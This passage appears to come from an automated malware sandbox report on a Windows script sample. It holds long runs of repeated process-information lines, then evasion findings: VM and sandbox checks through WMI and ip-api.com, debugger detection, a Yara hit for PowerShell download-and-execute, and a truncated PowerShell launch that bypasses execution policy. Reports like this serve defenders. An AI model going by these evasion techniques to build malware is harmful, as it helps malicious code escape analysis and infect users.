Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLT-^Q

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 29F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 49F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1585	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1506	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3655	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6134	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060	Thread sleep count: 3655 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748	Thread sleep count: 6134 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000003.00000002.1778680417.000001F406B2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kF6R0WSVoJ8YrOAvya0p3w5rMt7DTIMJ%2B%2F%2FQx%2FbcliIlPx%2FFRtnafd5lYwKxC06rOXwTXUeFthAcjEaIL%2Fh74oSSRF1SVDLvV8IPD5vhYd%2FrzQS9KqEmunji4amWHCZCdGH%2BRh5NPFpy"}],"group":"cf-nel","max_age":604800}
Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000003.00000002.1778680417.000001F406E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kF6R0WSVoJ8YrOAvya0p3w5rMt7DTIMJ%2B%2F%2FQx%2FbcliIlPx%2FFRtnafd5lYwKxC06rOXwTXUeFthAcjEaIL%2Fh74oSSRF1SVDLvV8IPD5vhYd%2FrzQS9KqEmunji4amWHCZCdGH%2BRh5NPFpy"}],"group":"cf-nel","max_age":604800}
Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: wscript.exe, 00000000.00000003.1687919767.000002262F338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1687834660.000002262D153000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AddInProcess32.exe, 00000004.00000002.2985019113.0000000005D9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: wscript.exe, 00000000.00000003.1687834660.000002262D153000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 4_2_00E17068 CheckRemoteDebuggerPresent,

4_2_00E17068

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.84.67 443

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_3744.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 